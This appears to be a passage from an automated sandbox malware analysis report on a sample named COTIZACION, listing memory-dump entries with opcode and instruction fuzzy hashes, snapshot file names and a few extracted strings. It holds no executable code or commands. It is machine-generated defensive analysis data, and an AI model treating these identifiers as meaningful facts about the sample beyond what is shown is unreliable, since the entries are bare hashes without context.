                                                                                                • Opcode Fuzzy Hash: 671da6973f5acfe5393bb593dae3034cf4e4d2121a2a5a0025ef8bcf4996911b
                                                                                                • Instruction Fuzzy Hash: 201133B69003488FDB10DF9AD444BDEBBF4EF49320F20881AE558AB250C374A544CFA1
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 3B717BBD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: 72540ab0f9e62d6ec26fd93acf71b084166e2babe398706a0c2bbe5b8f24fd8a
                                                                                                • Instruction ID: 754bf13eb3269a0f7085bb151820189963b022ef402eb94eebb6af3829cfddf7
                                                                                                • Opcode Fuzzy Hash: 72540ab0f9e62d6ec26fd93acf71b084166e2babe398706a0c2bbe5b8f24fd8a
                                                                                                • Instruction Fuzzy Hash: C61112B5900349CFDB20CFAAE585BDEBBF4EB48320F20885AD458A7700C378A540CFA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ]
                                                                                                • API String ID: 0-3352871620
                                                                                                • Opcode ID: 6da8e2dc323e2832df87e1d49a4d44ec825c99ef9b23d84cd64f704e7dfe05ef
                                                                                                • Instruction ID: 939f0156070c690c5cd377ad1b5a81c065ce5d057e8ffdafee14333641ec42e9
                                                                                                • Opcode Fuzzy Hash: 6da8e2dc323e2832df87e1d49a4d44ec825c99ef9b23d84cd64f704e7dfe05ef
                                                                                                • Instruction Fuzzy Hash: E8B16F34A40204CFCB14DBA8C894AADBBF2FF89311F648569E816EB355DB71DC46CB51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: \VZm
                                                                                                • API String ID: 0-3153696063
                                                                                                • Opcode ID: fb4aab27c73ea45edd1ef16f35ece412d56fd77e9428388825e0127062756456
                                                                                                • Instruction ID: fcc65d5d91214252cec00cf7502ba0c84a98ab374c640f38b7af205b4d9783d2
                                                                                                • Opcode Fuzzy Hash: fb4aab27c73ea45edd1ef16f35ece412d56fd77e9428388825e0127062756456
                                                                                                • Instruction Fuzzy Hash: BFA18E70E00709CFDF10CFA8C9857DEBBF1AF48715F248129E825AB294DB749989CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HS08lS08
                                                                                                • API String ID: 0-4026685390
                                                                                                • Opcode ID: 5f2fd80c57b9ff2b625abcf2cba9fb2d358b7a0fda9a3082eb87b7c8a9507a45
                                                                                                • Instruction ID: 94955ffc50767f7392cbe781d193cf8f880d4747e8aa7ff2b6022c8dc3eb7ac0
                                                                                                • Opcode Fuzzy Hash: 5f2fd80c57b9ff2b625abcf2cba9fb2d358b7a0fda9a3082eb87b7c8a9507a45
                                                                                                • Instruction Fuzzy Hash: D9315E30A40609DBDB05CFA4D89469EFBB2BF8A301F50861AE815FB240DB719846CB51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HS08lS08
                                                                                                • API String ID: 0-4026685390
                                                                                                • Opcode ID: c1c96de3bf8ad4494e1f0d48589631cd2d77b7293935fa527aa242c2a4599f7e
                                                                                                • Instruction ID: dad4b82ce1f0f05d51699d8baf8b3e55f4d2c355d8bd45665f1fd7cdfac7267d
                                                                                                • Opcode Fuzzy Hash: c1c96de3bf8ad4494e1f0d48589631cd2d77b7293935fa527aa242c2a4599f7e
                                                                                                • Instruction Fuzzy Hash: 72215E30A40609DBDB05CFA5C89469EFBB2BF89300F50861AE815BB340DB719C46CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Ko
                                                                                                • API String ID: 0-716275355
                                                                                                • Opcode ID: 0447265842addfae48a6e85e1d13cd5470d854c932f6abb2598b38c058d186be
                                                                                                • Instruction ID: 1cb21a697e302f989ffbe3188d758cf6cfd3e7779666f22bd4774f888dfbbda0
                                                                                                • Opcode Fuzzy Hash: 0447265842addfae48a6e85e1d13cd5470d854c932f6abb2598b38c058d186be
                                                                                                • Instruction Fuzzy Hash: E411C430E01245CFEF265BF4C814B693792AB5E316F14487AD865CF286DB64CD8D8BD1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: |
                                                                                                • API String ID: 0-2343686810
                                                                                                • Opcode ID: de747d6fe3dec13c50fcbace06490c0f032595379196f6abdc4a29a8137277f1
                                                                                                • Instruction ID: 691d338c1677df932d14bd02e1725a733554f23fb5bc69e1bc8efbfeb0e963d9
                                                                                                • Opcode Fuzzy Hash: de747d6fe3dec13c50fcbace06490c0f032595379196f6abdc4a29a8137277f1
                                                                                                • Instruction Fuzzy Hash: 87212C75F40210CFDB549BB888147AD7BF1BF48751F1044A9E91AEB395DB359901CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Ko
                                                                                                • API String ID: 0-716275355
                                                                                                • Opcode ID: 1bff9d93c244cc11987416775cb398724ceaf12070712c4b57dab37f50dbcb4b
                                                                                                • Instruction ID: 4b8dec894511cc1b778b1b461b77f35f270bb6c6a7692087caea43f25c86c781
                                                                                                • Opcode Fuzzy Hash: 1bff9d93c244cc11987416775cb398724ceaf12070712c4b57dab37f50dbcb4b
                                                                                                • Instruction Fuzzy Hash: E4118F30F00205CBEF269AB9C804B693392EB9D326F204939D866CF245DB65CD898BC1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: |
                                                                                                • API String ID: 0-2343686810
                                                                                                • Opcode ID: f301993f22847c1011f045e22dfb84830e52501820230bfa108c801a060ba623
                                                                                                • Instruction ID: 84115aab483f96249405be1eefee5623fbbf35a49c12aab863b96657ccdb556a
                                                                                                • Opcode Fuzzy Hash: f301993f22847c1011f045e22dfb84830e52501820230bfa108c801a060ba623
                                                                                                • Instruction Fuzzy Hash: 1B114974F40214DFDB449BB8C804B6E7BF6AF4C740F108469E91AEB3A4DB35A9018B90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7f5b6c0cbee7be3b0255074f12723171a98cbe3eddefb5c9a83befbb38af756a
                                                                                                • Instruction ID: 3ba120a931877e47e5d0a514d7de8bd6251d3253d5cc59c526eb0e054cf6f264
                                                                                                • Opcode Fuzzy Hash: 7f5b6c0cbee7be3b0255074f12723171a98cbe3eddefb5c9a83befbb38af756a
                                                                                                • Instruction Fuzzy Hash: D722AFB0700201CBDB16AB78C45526D73A2FBC9351B209A2EE416EB359CF35ED5BCB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 32a5cc902f7abd00487363d180d82d28c744184ff06ca66d68f34c6161662bd1
                                                                                                • Instruction ID: 8efbaf3ac3ea0b2d766419092f0a5159b6d4ba4c1ec8206a6ce38685c9d36a79
                                                                                                • Opcode Fuzzy Hash: 32a5cc902f7abd00487363d180d82d28c744184ff06ca66d68f34c6161662bd1
                                                                                                • Instruction Fuzzy Hash: 0B12ADB0700201CBDB16AB78C45526D73E2FBC9341B209A2EE416EB359CF35ED5B8B91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4499bed1f8eabbc8ba43d79195488a5923199d44b12900247e47f3953608d589
                                                                                                • Instruction ID: 037e9035b68c9a0e09eee7a5b8cdc1ca2b62f40e971815e0948a4d47199a50cf
                                                                                                • Opcode Fuzzy Hash: 4499bed1f8eabbc8ba43d79195488a5923199d44b12900247e47f3953608d589
                                                                                                • Instruction Fuzzy Hash: FED17D70A40205CFDB14CF68D89079EBBB2FF89311F64866AD819EB391D731DD498B92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8fb3aac2fd355dc6371de0a9bc7402a5076ad3f0457e2ffaf3feb37490460b94
                                                                                                • Instruction ID: a5f1823d0ba6f4620922b3ae5abd20762899fba6624083c12a9de4c9cd992cd1
                                                                                                • Opcode Fuzzy Hash: 8fb3aac2fd355dc6371de0a9bc7402a5076ad3f0457e2ffaf3feb37490460b94
                                                                                                • Instruction Fuzzy Hash: CDB16E70E00209CFDB10CFA9D8917DDBBF1AF88759F148529D825EB294EB749889CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 437ab61241355eb336bd074db95568b1461b597c01ab1e019702a1802677af99
                                                                                                • Instruction ID: 7ba81f5efd28439da748af21ca9b59152e0e4d580c1682ce9c9c4115ce904d47
                                                                                                • Opcode Fuzzy Hash: 437ab61241355eb336bd074db95568b1461b597c01ab1e019702a1802677af99
                                                                                                • Instruction Fuzzy Hash: D261D2B5F001214BDB559BAEC89465EBADBAFC4A20B154139D80EDB360DE76EC0287D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 279cd2d20b4ac6a471f978a54e9f726f861ed5af1e4fa51bf75f34a446a281d2
                                                                                                • Instruction ID: c6eda92a13f310a0b77344f4380c0a91dc5742a1508511087c3310d3314c8338
                                                                                                • Opcode Fuzzy Hash: 279cd2d20b4ac6a471f978a54e9f726f861ed5af1e4fa51bf75f34a446a281d2
                                                                                                • Instruction Fuzzy Hash: 96813CB4B012498FDB44DBB9C4A065EBBB2BFC9700F108569D51AEB385DB30EC428B91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a6b40f810ceb3a633accdfe0c27af1e0a3958a24f4a01acb7db233257e7df51c
                                                                                                • Instruction ID: acdcd6f35b7e191be6535bc38c8d7a8e3c8200dce0b1362e769031d2eddeb0c8
                                                                                                • Opcode Fuzzy Hash: a6b40f810ceb3a633accdfe0c27af1e0a3958a24f4a01acb7db233257e7df51c
                                                                                                • Instruction Fuzzy Hash: 68911B74E006198FEB10DF68C890B9DB7B1FF89310F208699D55DBB291DB70AA85CF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 530cc49463b14f3e29d4fd4418af7183b52d2cb2efb455b6ee6117bef3aca268
                                                                                                • Instruction ID: ecea420dd84d72452af9bc59e611644e0d7919f3912fce966ef66daa5b37876c
                                                                                                • Opcode Fuzzy Hash: 530cc49463b14f3e29d4fd4418af7183b52d2cb2efb455b6ee6117bef3aca268
                                                                                                • Instruction Fuzzy Hash: 76912E74E006198BEB10DF68C890B9DB7B1FF89310F208699D55DBB395DB70AA85CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fad231dc61cdb9eac8279d434b67cd3d37204a2d4122322e877ddeacc67db6c3
                                                                                                • Instruction ID: 57fab00a26ec40665c03cbf8612537a13d119cac0062d6db6f9b75899ac22804
                                                                                                • Opcode Fuzzy Hash: fad231dc61cdb9eac8279d434b67cd3d37204a2d4122322e877ddeacc67db6c3
                                                                                                • Instruction Fuzzy Hash: 8F61A170F002089FEB149BA5C85479EBBF6EFC8700F20816AE51AAB391DF758D459F51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bc57b53f9eaa554c538aac2dec315f1996098fddb9b00095807102556127d242
                                                                                                • Instruction ID: 37116e3cbdc3e9076a2c19078ce612f2889bf439f22d0d021363187de4ef8c1c
                                                                                                • Opcode Fuzzy Hash: bc57b53f9eaa554c538aac2dec315f1996098fddb9b00095807102556127d242
                                                                                                • Instruction Fuzzy Hash: AF511875E01109DFEB04AB78E49869DBBB1FF89311F104A79E409E7290DB358D46CB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 164efa58d7de8677efef87ef2e11771c180201b71d77a3521eca82f8f5b867a0
                                                                                                • Instruction ID: bce9c96756fd6d1da1e8d9a382d3ac72b2cd6619edd7692eb1e9c6ad0b7f8d21
                                                                                                • Opcode Fuzzy Hash: 164efa58d7de8677efef87ef2e11771c180201b71d77a3521eca82f8f5b867a0
                                                                                                • Instruction Fuzzy Hash: 1E515FB4B516058FDB54DB69C8A0B6E7BF6FBCD740F508669C40AEB384DB709C028B61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ecb5c96cd3a9a6129054f05819b6e9c3eff0d2fb2cd6bc5940580e665fcc2347
                                                                                                • Instruction ID: a22b3ed0cbf74ee269150f82688ff7358e9e87758aba25f1f8dab90102d807f7
                                                                                                • Opcode Fuzzy Hash: ecb5c96cd3a9a6129054f05819b6e9c3eff0d2fb2cd6bc5940580e665fcc2347
                                                                                                • Instruction Fuzzy Hash: AA51B8B8B412458BFB109768E898B5F27ABE78DB90F204626E50FD73D5C979CC4243A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f96f5e4ec32100d53710a137cc5d8ed547a158e07dd8eed79636bc5b4651c4e
                                                                                                • Instruction ID: ed0c4cc24e2958a31e9a021317c0ce5f1986f826450e72bdb5fd7b9c9beacaef
                                                                                                • Opcode Fuzzy Hash: 0f96f5e4ec32100d53710a137cc5d8ed547a158e07dd8eed79636bc5b4651c4e
                                                                                                • Instruction Fuzzy Hash: DF516E74E002099FDB04EFA4D895AEEBBB2FF89300F108569E405BB265DB319E45CF55
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 482d23406cb39688947541bed2184f37fac7affe37ca5411262f8afff44f47bc
                                                                                                • Instruction ID: ae846ff2b33e8e0ccaa1dd1ce7be0b4c977a313acf1dc8e0616f83bed53ec207
                                                                                                • Opcode Fuzzy Hash: 482d23406cb39688947541bed2184f37fac7affe37ca5411262f8afff44f47bc
                                                                                                • Instruction Fuzzy Hash: 9451BCB8E012068FFB22CF69C4C075EBBB2EB45750F248969D05EDB2C1C639D981DB51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f9b8c282e46b6a0d6cf15043d454605258a220881b328f1ae14792f17b796446
                                                                                                • Instruction ID: c8d4dd60d9f10676fe21f47284b884768ed2884e0fdcfcf21959dec6d14bb02e
                                                                                                • Opcode Fuzzy Hash: f9b8c282e46b6a0d6cf15043d454605258a220881b328f1ae14792f17b796446
                                                                                                • Instruction Fuzzy Hash: 7C314F30E14309CFDB15CBB9D85679EB7B2EF56301F20855AE812FB290E7709D4A8B50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 39ba49a2b57860649bc8da77524ca76d1597eab4c7157d490bc52a4af3ec985c
                                                                                                • Instruction ID: e2427f1ebfcf2c84872d17f661d56060791335825da1317f0e22b975c2513a8d
                                                                                                • Opcode Fuzzy Hash: 39ba49a2b57860649bc8da77524ca76d1597eab4c7157d490bc52a4af3ec985c
                                                                                                • Instruction Fuzzy Hash: 7A512375E00218CFDB18CFA9C885B9DBBB1FF48310F54852AE829BB351D774A848CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ba61c72c844d90e08e164e9cbdfbb7a3e2771943eb9162451781e8b682d4c5ed
                                                                                                • Instruction ID: adeb0986b2027b445d08e0fe29d7bc42d602a7ebbf9752ac35d2b8729eb8e414
                                                                                                • Opcode Fuzzy Hash: ba61c72c844d90e08e164e9cbdfbb7a3e2771943eb9162451781e8b682d4c5ed
                                                                                                • Instruction Fuzzy Hash: A54172B6E117068FEB21CF99D8C0A9FB7B2FB88710F104A2AD11DD7650D730E9458B91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fa6ec68be38f25e7ac5ff0e204516c74d317adbb37aa6e6fc72f8a9bb91e6850
                                                                                                • Instruction ID: 44f646029cdac14ea7d2fab69f99bc60fd8634605284b17fe6c4667c3a1435c2
                                                                                                • Opcode Fuzzy Hash: fa6ec68be38f25e7ac5ff0e204516c74d317adbb37aa6e6fc72f8a9bb91e6850
                                                                                                • Instruction Fuzzy Hash: E2511375E00218CFDB18CFA9C885B9DBBB1FF48311F548529E829BB350DB74A848CB95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2085863ec10fc3ccc7692a3674bf3ec45f9cdbe0851841865d76d41dcd27834a
                                                                                                • Instruction ID: b49a6d0d1f72833d7d0bba4889bbe5f6ea9fa49c82fb72a7a5a9d197c9680a77
                                                                                                • Opcode Fuzzy Hash: 2085863ec10fc3ccc7692a3674bf3ec45f9cdbe0851841865d76d41dcd27834a
                                                                                                • Instruction Fuzzy Hash: 65416E74A002089FEB149FE9C854B9EBBF6EFC8700F20856AD016AB395DB758D059F90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7c70e84f53a13b65ddedee0fe7945e6d3dbd8f3a5d8ef603d53c0403f23f5ff3
                                                                                                • Instruction ID: d110acadc1608df2afcd2c00e0c61c83abf856d9e42107878e657bc546753227
                                                                                                • Opcode Fuzzy Hash: 7c70e84f53a13b65ddedee0fe7945e6d3dbd8f3a5d8ef603d53c0403f23f5ff3
                                                                                                • Instruction Fuzzy Hash: 2B512170216BC18FE706DF28DD8895A3FF1BBBE315304A559D0046B23ADAB4791BCB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 272054de0b251037195da171d0afbb874f91bcffe85ae9d077f7161e14241fff
                                                                                                • Instruction ID: 237b5ab9ffd92cf370153381306259710a9c7a37f9043837f007b78f439f378a
                                                                                                • Opcode Fuzzy Hash: 272054de0b251037195da171d0afbb874f91bcffe85ae9d077f7161e14241fff
                                                                                                • Instruction Fuzzy Hash: 1D41D1B4E0134A9FEB14DF75C49479EBBB2EF85780F244A2AD409EB380DB749842CB51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f25d304e692bb2eb0c72fcab8d14ea98d8530c3de9ca4f17bc07191d446d11c3
                                                                                                • Instruction ID: 03c8fc0b6b023abfae17a0b6fbd804ec7020878a80803f6e4ceda7a9461cfd40
                                                                                                • Opcode Fuzzy Hash: f25d304e692bb2eb0c72fcab8d14ea98d8530c3de9ca4f17bc07191d446d11c3
                                                                                                • Instruction Fuzzy Hash: CF411534B14214CFDB54DB68D499AAD7BF2AF8D702F604069E812EB3A1CB75DC45CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3bc039e3f8d50350e8e1f833924f089042d734aa1f79d48b11f0bb8925d7260c
                                                                                                • Instruction ID: 4ff5b27d38a4ac9b010f67027026562cdac5ba75898ec2d769780f50f4a4220d
                                                                                                • Opcode Fuzzy Hash: 3bc039e3f8d50350e8e1f833924f089042d734aa1f79d48b11f0bb8925d7260c
                                                                                                • Instruction Fuzzy Hash: 9451FC70212BC18FE706DF28DD889563FF5BBAE315704A269D0046B23ADAB47917CBD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c2f35e513ac152cfdab0704d811133e4c488453fe09097f941fcc538fd1cc81
                                                                                                • Instruction ID: bc9546d0c447530fa0e2079ec66fef3929594afdc4ea804e242f6b0acbf64f7c
                                                                                                • Opcode Fuzzy Hash: 8c2f35e513ac152cfdab0704d811133e4c488453fe09097f941fcc538fd1cc81
                                                                                                • Instruction Fuzzy Hash: A2319374B012058FEB05AB74C8A465E7BF6AF89B40F104669D406DB391EF35DD02CBA1
                                                                                                Memory Dump Source
